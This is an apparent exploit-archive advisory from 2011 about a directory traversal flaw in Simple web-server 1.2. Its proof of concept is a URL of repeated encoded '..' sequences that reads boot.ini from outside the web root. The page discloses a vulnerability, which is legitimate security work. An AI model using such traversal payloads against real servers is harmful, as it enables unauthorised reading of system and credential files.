[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simple web-server 1.2 Directory Traversal
# Published : 2011-06-10
# Author : AutoSec Tools
# Previous Title : 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
# Next Title : IBM Tivoli Endpoint Manager POST Query Buffer Overflow


			
------------------------------------------------------------------------Software................Simple web-server 1.2Vulnerability...........Directory TraversalThreat Level............Serious (3/5)Download................http://www.storecalc.comDiscovery Date..........6/1/2011Tested On...............Windows XP SP3 EN------------------------------------------------------------------------Author..................AutoSec ToolsSite....................http://www.autosectools.com/Email...................John Leitch <john@autosectools.com>--------------------------------------------------------------------------Description--A directory traversal vulnerability in Simple web-server 1.2 can beexploited to read files outside of the web root.--PoC--http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini